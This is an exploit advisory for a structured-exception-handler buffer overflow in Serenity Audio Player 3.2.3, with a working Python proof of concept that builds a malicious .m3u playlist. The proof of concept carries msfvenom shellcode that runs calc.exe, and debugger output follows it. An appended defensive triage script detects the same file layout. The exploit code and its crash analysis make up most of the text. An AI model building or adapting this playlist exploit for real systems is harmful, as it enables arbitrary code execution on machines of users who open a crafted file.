Serenity Media Player 3.2.3 Buffer Overflow Exploit

2015.09.02
Credit: Arjun Basnet
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

Serenity is a playlist-based audio player for Windows. It features a clean and simple interface with minimal overhead. Formats supported are limited only by the CODECs and drivers installed on the machine.

SEH local buffer overflow in Serenity Audio Player 3.2.3 (earlier known as Malx Media Player)

Discovered by: Arjun Basnet from Cyber Security Works Pvt. Ltd.

Affected Version:
Serenity Audio Player 3.2.3
Malx Media Player 3.2.2
Lower versions may also be affected (not checked)

Software link: http://malsmith.kyabram.biz/serenity/

The vulnerability was tested on: Windows 7 and Windows XP SP2. It could also work on other versions of Windows (not checked).

POC video link: http://youtu.be/ZMC-URZagMg

POC exploit code:
-------------------------------------------------------------------------------------------------------------------------
import os

# header
buffer = b"M3U"
buffer += b"#EXTM3"
buffer += b"A" * 1011

# nSEH: JMP 6 bytes (short jump over the SE handler address)
buffer += b"\xEB\x06\x90\x90"
# SE handler overwrite: 0x00404AE3, an address inside the main image
buffer += b"\xE3\x4A\x40\x00"
buffer += b"\x90" * 30

# msfvenom -p windows/exec EXITFUNC=seh CMD=calc.exe -f c -a x86 -b "\x0a\x1a"
# Payload size: 220 bytes
# BadCharacters: \x0a\x1a
buffer += (b"\xb8\xc2\x04\xed\x11\xd9\xc5\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
           b"\x31\x31\x43\x13\x03\x43\x13\x83\xc3\xc6\xe6\x18\xed\x2e\x64"
           b"\xe2\x0e\xae\x09\x6a\xeb\x9f\x09\x08\x7f\x8f\xb9\x5a\x2d\x23"
           b"\x31\x0e\xc6\xb0\x37\x87\xe9\x71\xfd\xf1\xc4\x82\xae\xc2\x47"
           b"\x00\xad\x16\xa8\x39\x7e\x6b\xa9\x7e\x63\x86\xfb\xd7\xef\x35"
           b"\xec\x5c\xa5\x85\x87\x2e\x2b\x8e\x74\xe6\x4a\xbf\x2a\x7d\x15"
           b"\x1f\xcc\x52\x2d\x16\xd6\xb7\x08\xe0\x6d\x03\xe6\xf3\xa7\x5a"
           b"\x07\x5f\x86\x53\xfa\xa1\xce\x53\xe5\xd7\x26\xa0\x98\xef\xfc"
           b"\xdb\x46\x65\xe7\x7b\x0c\xdd\xc3\x7a\xc1\xb8\x80\x70\xae\xcf"
           b"\xcf\x94\x31\x03\x64\xa0\xba\xa2\xab\x21\xf8\x80\x6f\x6a\x5a"
           b"\xa8\x36\xd6\x0d\xd5\x29\xb9\xf2\x73\x21\x57\xe6\x09\x68\x3d"
           b"\xf9\x9c\x16\x73\xf9\x9e\x18\x23\x92\xaf\x93\xac\xe5\x2f\x76"
           b"\x89\x14\xc1\x4b\x07\x80\x78\x3e\x6a\xcc\x7a\x94\xa8\xe9\xf8"
           b"\x1d\x50\x0e\xe0\x57\x55\x4a\xa6\x84\x27\xc3\x43\xab\x94\xe4"
           b"\x41\xc8\x7b\x77\x09\x21\x1e\xff\xa8\x3d")

file = "exploit.m3u"
f = open(file, "wb")   # binary mode so no byte is translated on write
f.write(buffer)
f.close()
----------------------------------------------------------------------------------------------------------------------------------

Stack Trace:

Microsoft (R) Windows Debugger Version 6.12.0002.633 X86
Copyright (c) Microsoft Corporation. All rights reserved.

Symbol search path is: SRV*http://msdl.microsoft.com/download/symbols
Executable search path is:
ModLoad: 00400000 0040a000   image00400000
ModLoad: 7c900000 7c9af000   ntdll.dll
|. . 0 id: 1418 create name: image00400000
ModLoad: 7c800000 7c8f6000   C:\WINDOWS\system32\kernel32.dll
ModLoad: 7e410000 7e4a1000   C:\WINDOWS\system32\USER32.dll
ModLoad: 77f10000 77f59000   C:\WINDOWS\system32\GDI32.dll
ModLoad: 763b0000 763f9000   C:\WINDOWS\system32\comdlg32.dll
ModLoad: 77dd0000 77e6b000   C:\WINDOWS\system32\ADVAPI32.dll
ModLoad: 77e70000 77f02000   C:\WINDOWS\system32\RPCRT4.dll
ModLoad: 77fe0000 77ff1000   C:\WINDOWS\system32\Secur32.dll
ModLoad: 773d0000 774d3000   C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\COMCTL32.dll
ModLoad: 77c10000 77c68000   C:\WINDOWS\system32\msvcrt.dll
ModLoad: 77f60000 77fd6000   C:\WINDOWS\system32\SHLWAPI.dll
ModLoad: 7c9c0000 7d1d7000   C:\WINDOWS\system32\SHELL32.dll
ModLoad: 76b40000 76b6d000   C:\WINDOWS\system32\WINMM.dll
ModLoad: 76390000 763ad000   C:\WINDOWS\system32\IMM32.DLL
ModLoad: 5ad70000 5ada8000   C:\WINDOWS\system32\uxtheme.dll
ModLoad: 74720000 7476c000   C:\WINDOWS\system32\MSCTF.dll
ModLoad: 10000000 100b9000   C:\WINDOWS\system32\rlls.dll
ModLoad: 71ab0000 71ac7000   C:\WINDOWS\system32\WS2_32.dll
ModLoad: 71aa0000 71aa8000   C:\WINDOWS\system32\WS2HELP.dll
ModLoad: 74c80000 74cac000   C:\WINDOWS\system32\OLEACC.dll
ModLoad: 76080000 760e5000   C:\WINDOWS\system32\MSVCP60.dll
ModLoad: 774e0000 7761d000   C:\WINDOWS\system32\ole32.dll
ModLoad: 77120000 771ab000   C:\WINDOWS\system32\OLEAUT32.dll
ModLoad: 78050000 78120000   C:\WINDOWS\system32\WININET.dll
ModLoad: 01ce0000 01ce9000   C:\WINDOWS\system32\Normaliz.dll
ModLoad: 78000000 78045000   C:\WINDOWS\system32\iertutil.dll
ModLoad: 76bf0000 76bfb000   C:\WINDOWS\system32\PSAPI.DLL
ModLoad: 77c00000 77c08000   C:\WINDOWS\system32\VERSION.dll
(1418.1124): C++ EH exception - code e06d7363 (first chance)
ModLoad: 755c0000 755ee000   C:\WINDOWS\system32\msctfime.ime
ModLoad: 767f0000 76817000   C:\WINDOWS\system32\Schannel.dll
ModLoad: 77a80000 77b15000   C:\WINDOWS\system32\CRYPT32.dll
ModLoad: 77b20000 77b32000   C:\WINDOWS\system32\MSASN1.dll
ModLoad: 5b860000 5b8b5000   C:\WINDOWS\system32\NETAPI32.dll
ModLoad: 769c0000 76a74000   C:\WINDOWS\system32\USERENV.dll
ModLoad: 029a0000 029f8000   C:\WINDOWS\system32\LavasoftTcpService.dll
ModLoad: 71a50000 71a8f000   C:\WINDOWS\system32\MSWSOCK.dll
ModLoad: 76d60000 76d79000   C:\WINDOWS\system32\IPHLPAPI.DLL
(1418.173c): Unknown exception - code c0000096 (first chance)
(1418.173c): Unknown exception - code c0000096 (!!! second chance !!!)

r
eax=00000000 ebx=00000000 ecx=77c40ad6 edx=01ab0fe8 esi=00401270 edi=0012fbb7
eip=00400055 esp=0012fb90 ebp=0012fe18 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
*** WARNING: Unable to verify checksum for image00400000
*** ERROR: Module load completed but symbols could not be loaded for image00400000
image00400000+0x55:
00400055 6f              outs    dx,dword ptr [esi]       ds:0023:00401270=0824448b

rF
fpcw=027F: rn 53 puozdi  fpsw=4000: top=0 cc=1000 --------  fptw=FFFF
fopcode=0000  fpip=001b:5ad72985  fpdp=0023:0012fb30
st0=-1.253621103784834226700e-1829  st1= 0.000000003250463689420e+1720
st2= 0.000000923709286317790e-4933  st3= 5.030055843417188097910e-4932
st4=-2.532331139691264054760e+3433  st5= 1.000000000000000000000e+0000
st6= 1.000000000000000000000e+0000  st7= 1.000000000000000000000e+0000
image00400000+0x55:
00400055 6f              outs    dx,dword ptr [esi]       ds:0023:00401270=0824448b

rX
xmm0=0 1.8357e-043 -0.0146141 -1.02234
xmm1=-0.0146141 -1.52194e-005 -1.02234 -1.52193e-005
xmm2=1.4013e-045 -0.0147865 -1.522e-005 -1.00728
xmm3=1.74424e-039 -1.#QNAN 8.26766e-044 -1.52198e-005
xmm4=6.43282e+037 8.26766e-044 1.74228e-039 0
xmm5=4.90454e-044 1.74227e-039 8.15556e-043 3.78351e-044
xmm6=-1.52193e-005 3.02814e+016 0 1.74084e-039
xmm7=1.68436e-042 7.00649e-044 1.63952e-042 2.00015
image00400000+0x55:
00400055 6f              outs    dx,dword ptr [esi]       ds:0023:00401270=0824448b

kb
ChildEBP RetAddr  Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0012fe18 7e418816 00401270 006d01f4 00000601 image00400000+0x55
0012fe80 7e4189cd 00000000 00401270 006d01f4 USER32!UserCallWinProcCheckWow+0x150
0012fee0 7e4196c7 0012ff0c 00000001 7e42fac4 USER32!DispatchMessageWorker+0x306
0012fef0 00401244 0012ff0c 0012ffc0 00000000 USER32!DispatchMessageA+0xf
0012ff24 00404ff6 00400000 00000000 0015eff3 image00400000+0x1244
0012ffc0 7c817067 00000000 00000000 7ffd9000 image00400000+0x4ff6
0012fff0 00000000 00404ec2 00000000 78746341 kernel32!BaseProcessStart+0x23

.load C:\peach\bin\msec.dll
!exploitable -m
IDENTITY:HostMachine\HostUser
PROCESSOR:X86
CLASS:USER
QUALIFIER:USER_PROCESS
EVENT:DEBUG_EVENT_EXCEPTION
EXCEPTION_FAULTING_ADDRESS:0x400055
EXCEPTION_CODE:0xC0000096
EXCEPTION_LEVEL:SECOND_CHANCE
EXCEPTION_TYPE:STATUS_PRIVILEGED_INSTRUCTION
MAJOR_HASH:0x5e212578
MINOR_HASH:0x3a4f4f12
STACK_DEPTH:7
STACK_FRAME:image00400000+0x55
STACK_FRAME:USER32!UserCallWinProcCheckWow+0x150
STACK_FRAME:USER32!DispatchMessageWorker+0x306
STACK_FRAME:USER32!DispatchMessageA+0xf
STACK_FRAME:image00400000+0x1244
STACK_FRAME:image00400000+0x4ff6
STACK_FRAME:kernel32!BaseProcessStart+0x23
INSTRUCTION_ADDRESS:0x0000000000400055
INVOKING_STACK_FRAME:0
DESCRIPTION:Privileged Instruction Violation
SHORT_DESCRIPTION:PrivilegedInstruction
CLASSIFICATION:EXPLOITABLE
BUG_TITLE:Exploitable - Privileged Instruction Violation starting at image00400000+0x0000000000000055 (Hash=0x5e212578.0x3a4f4f12)
EXPLANATION:A privileged instruction exception indicates that the attacker controls execution flow.

!msec.exploitable -m
The call to LoadLibrary(msec) failed, Win32 error 0n127
    "The specified procedure could not be found."
Please check your debugger configuration and/or network access.
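A defender-side triage check for the playlist layout this PoC abuses, added here as an editor's example (not code from the advisory or its author). The threshold, the regex and all names are assumptions, and both sample files are constructed; the hostile sample mirrors the PoC's offsets and SE handler address with 0xCC filler in place of the payload.

```python
"""Heuristic triage of .m3u playlists for SEH-overflow-style content.

Editor's added example, not part of the advisory; threshold, regex and
names are assumptions. Three checks per playlist line:
  1. length above MAX_ENTRY (the PoC pads 1011 bytes before the SEH record);
  2. ASCII control bytes, which a text playlist never needs;
  3. the PoC's nSEH/SEH layout: short JMP (EB xx 90 90) + 4-byte handler.
"""
import re

MAX_ENTRY = 1000  # constructed threshold; tune against real playlists
TEXT_CTRL_OK = {0x09, 0x0D}  # tab and CR are legitimate in a text playlist
# EB = short JMP with a forward rel8, two NOPs, then the SE handler pointer
NSEH_RE = re.compile(rb"\xEB[\x00-\x7F]\x90\x90(?P<handler>.{4})", re.DOTALL)


def triage_m3u(data: bytes) -> dict:
    """Return {'suspicious': bool, 'findings': [(kind, line_no, detail), ...]}."""
    findings = []
    # M3U is newline separated; a PoC that avoids \x0a becomes one huge line.
    for line_no, line in enumerate(data.split(b"\n"), start=1):
        if len(line) > MAX_ENTRY:
            findings.append(("long_entry", line_no, len(line)))
        ctrl = sum(1 for b in line if b < 0x20 and b not in TEXT_CTRL_OK)
        if ctrl:
            findings.append(("control_bytes", line_no, ctrl))
        for m in NSEH_RE.finditer(line):
            handler = int.from_bytes(m.group("handler"), "little")
            findings.append(("seh_record", line_no, f"0x{handler:08x}"))
    return {"suspicious": bool(findings), "findings": findings}


def seh_handlers(data: bytes) -> list:
    """Only the SE handler addresses a file would install, as hex strings."""
    return [d for k, _, d in triage_m3u(data)["findings"] if k == "seh_record"]


# Constructed samples (not the advisory's file): a normal playlist, and a
# file laid out like the PoC with 0xCC filler where the payload would be.
BENIGN = b"#EXTM3U\n#EXTINF:213,Artist - Title\nC:\\Music\\song.mp3\n"
HOSTILE = (b"M3U#EXTM3" + b"A" * 1011 + b"\xEB\x06\x90\x90"
           + b"\xE3\x4A\x40\x00" + b"\x90" * 30 + b"\xCC" * 220)

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("hostile", HOSTILE)):
        print(name, triage_m3u(blob))
```

Run against a directory of real playlists first: a single over-long or control-byte hit is a triage signal, while a recovered handler address inside the player's own image (0x00400000 to 0x0040a000 in the debugger output above) is the strong indicator, because that range is what the PoC targets.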

References:

http://youtu.be/ZMC-URZagMg

